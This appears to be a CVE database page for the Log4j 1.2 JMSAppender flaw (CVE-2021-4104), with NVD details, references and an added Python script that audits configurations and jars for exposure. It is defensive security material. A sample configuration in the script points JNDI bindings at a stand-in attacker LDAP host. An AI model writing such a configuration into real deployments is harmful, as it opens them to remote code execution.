CVE-2021-4104
7.5 HIGH
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration
Published: 2021-12-14 · Last updated: 2026-05-28
Severity and scoring
- CVSS
- 7.5 HIGH
- Vector
- CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
- CWE
- CWE-502
Affected products
| Vendor | Product |
|---|---|
| apache | log4j (1.2.x; only deployments that configure JMSAppender, per the description below) |
| fedoraproject | fedora |
| oracle | advanced_supply_chain_planning, business_intelligence, business_process_management_suite |
| redhat | affected Red Hat products are enumerated on the Red Hat CVE page listed under References |
Description
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Source: NVD
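The exposure described above is a configuration problem rather than a parsing bug: the two options named in the description are resolved through JNDI when the appender activates, so the practical checks are (a) does a log4j.properties wire JMSAppender into a logger, and do its JNDI-relevant options already point at a remote naming service, and (b) does the deployed jar still ship the JMSAppender class. The Python below is an added example, not code from the NVD record, Red Hat, or the Log4j project. It assumes the standard log4j.properties key layout (`log4j.appender.<name>=<class>`, `log4j.appender.<name>.<Option>=<value>`, `log4j.rootLogger`/`log4j.logger.<x>=LEVEL, <appender>, ...`) and the usual class path inside the jar; the sample configurations, the `attacker.example` host, and the stand-in jar are constructed for the demonstration.

```python
"""Audit a Log4j 1.2 deployment for CVE-2021-4104 exposure.

Added example; not code from the CVE record or the Log4j project. Assumes
the standard log4j.properties key layout and that JMSAppender lives at its
usual path inside the log4j jar.
"""
import re
import zipfile
from typing import Dict, List, Set, Tuple

JMS_APPENDER_CLASS = "org.apache.log4j.net.JMSAppender"
JMS_APPENDER_ENTRY = "org/apache/log4j/net/JMSAppender.class"

# The two binding-name options named in the CVE text are resolved through
# JNDI when the appender activates; ProviderURL decides which server answers
# a bare name, so it is checked as well.
JNDI_OPTIONS = ("TopicConnectionFactoryBindingName", "TopicBindingName", "ProviderURL")
REMOTE_JNDI = re.compile(r"^(ldap|ldaps|rmi|iiop|corba|dns|nis|nds)://", re.IGNORECASE)

APPENDER_KEY = re.compile(r"^log4j\.appender\.([^.=\s]+)(?:\.([^=\s]+))?\s*=\s*(.*)$")
LOGGER_KEY = re.compile(
    r"^log4j\.(?:rootLogger|rootCategory|logger\.[^=\s]+|category\.[^=\s]+)\s*=\s*(.*)$"
)


def parse_properties(text: str) -> Tuple[Dict[str, Dict[str, str]], Set[str]]:
    """Return (appenders, attached): appender name -> options (class under
    the key "class"), and the set of appender names some logger references."""
    appenders: Dict[str, Dict[str, str]] = {}
    attached: Set[str] = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = APPENDER_KEY.match(line)
        if m:
            name, option, value = m.group(1), m.group(2), m.group(3).strip()
            appenders.setdefault(name, {})[option or "class"] = value
            continue
        m = LOGGER_KEY.match(line)
        if m:
            # "LEVEL, app1, app2": everything after the first comma is an appender name.
            parts = [p.strip() for p in m.group(1).split(",")]
            attached.update(p for p in parts[1:] if p)
    return appenders, attached


def audit_log4j_properties(text: str) -> List[dict]:
    """One finding per JMSAppender definition.

    "exploitable": a JNDI-relevant option already points at a remote naming
    service. "configured": JMSAppender is attached with local names, one
    config edit away from the former. "dormant": defined but referenced by
    no logger, so PropertyConfigurator never instantiates it.
    """
    appenders, attached = parse_properties(text)
    findings = []
    for name, opts in appenders.items():
        if opts.get("class") != JMS_APPENDER_CLASS:
            continue
        remote = [k for k in JNDI_OPTIONS if REMOTE_JNDI.match(opts.get(k, ""))]
        if name not in attached:
            severity = "dormant"
        elif remote:
            severity = "exploitable"
        else:
            severity = "configured"
        findings.append({
            "appender": name,
            "severity": severity,
            "remote_jndi_options": remote,
            "jndi_options": {k: opts[k] for k in JNDI_OPTIONS if k in opts},
        })
    return findings


def jar_has_jmsappender(jar_path: str) -> bool:
    """True if the jar still ships JMSAppender. Deleting that entry
    (zip -q -d log4j-1.2.x.jar org/apache/log4j/net/JMSAppender.class) removes
    the vulnerable code path while the upgrade to Log4j 2 is pending; it is a
    workaround, not a fix for an end-of-life library."""
    with zipfile.ZipFile(jar_path) as jar:
        return JMS_APPENDER_ENTRY in jar.namelist()


def build_sample_jar(path: str, include_jms: bool) -> str:
    """Write a constructed stand-in for a log4j 1.2 jar (empty class entries,
    enough for the path check above) and return its path."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("org/apache/log4j/Logger.class", b"")
        if include_jms:
            jar.writestr(JMS_APPENDER_ENTRY, b"")
    return path


# Constructed sample configurations; attacker.example is a reserved test name.
VULNERABLE_CONFIG = """\
log4j.rootLogger=INFO, stdout, jms
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.layout.ConversionPattern=%d %p %c - %m%n
log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.jms.ProviderURL=ldap://attacker.example:1389/
log4j.appender.jms.TopicConnectionFactoryBindingName=ConnectionFactory
log4j.appender.jms.TopicBindingName=ldap://attacker.example:1389/o=Exploit
"""

HARDENED_CONFIG = """\
log4j.rootLogger=INFO, stdout
log4j.appender.stdout=org.apache.log4j.ConsoleAppender
log4j.appender.stdout.layout=org.apache.log4j.PatternLayout
log4j.appender.stdout.layout.ConversionPattern=%d %p %c - %m%n
"""

if __name__ == "__main__":
    for label, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_log4j_properties(cfg))
```

Treat a "configured" finding as seriously as an "exploitable" one when anyone other than the operators can write the configuration file (shared volumes, config management with broad write rights, or an application that reloads log4j.properties from a user-writable path): the precondition in the CVE title is exactly that write access, and flipping a local binding name to a remote URL is a one-line edit.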
References
- [NVD] https://nvd.nist.gov/vuln/detail/CVE-2021-4104
- [Other] http://www.openwall.com/lists/oss-security/2022/01/18/3
- [Other] https://access.redhat.com/security/cve/CVE-2021-4104
- [Other] https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
- [Other] https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
- [Other] https://security.gentoo.org/glsa/202209-02
- [Other] https://security.gentoo.org/glsa/202310-16
- [Other] https://security.gentoo.org/glsa/202312-02
- [Other] https://security.gentoo.org/glsa/202312-04
- [Other] https://security.netapp.com/advisory/ntap-20211223-0007/
- [Other] https://www.cve.org/CVERecord?id=CVE-2021-44228
- [Other] https://www.kb.cert.org/vuls/id/930724
- [Other] https://www.oracle.com/security-alerts/cpuapr2022.html
- [Other] https://www.oracle.com/security-alerts/cpujan2022.html
- [Other] https://www.oracle.com/security-alerts/cpujul2022.html
Related CVEs
Same vendor
- CVE-2026-1767 — A flaw was found in the GNOME localsearch (previously known as tracker-miners) MP3 Extractor `tracker-extract-mp3` component (5.6 MEDIUM)
- CVE-2026-1766 — A flaw was found in GNOME localsearch (previously known as tracker-miners) MP3 Extractor, specifically within the tracker-extract-mp3 com... (5.6 MEDIUM)
- CVE-2026-50645 — There is no restriction on the amount of attachment headers that a message can contain when being deserialized by Apache CXF, which can l... (7.5 HIGH)
- CVE-2026-50634 — A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be exploited to cause CXF to process metadata that was not authenticate... (6.5 MEDIUM)
- CVE-2026-50633 — A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an atta... (8.1 HIGH)
Same CWE
- CVE-2026-48775 — LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite) (6.8 MEDIUM)
- CVE-2026-10748 — An authenticated user with the nx-licensing-create privilege can upload a specially crafted license file to execute arbitrary operating s...
- CVE-2026-24228 — NVIDIA NeMo Framework for Linux contains a vulnerability where an attacker may cause deserialization of untrusted data (7.8 HIGH)
- CVE-2026-48853 — Deserialization of Untrusted Data and Allocation of Resources Without Limits or Throttling vulnerabilities in elixir-grpc grpc allow unau...
- CVE-2026-9691 — Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.1 versions (9.8 CRITICAL)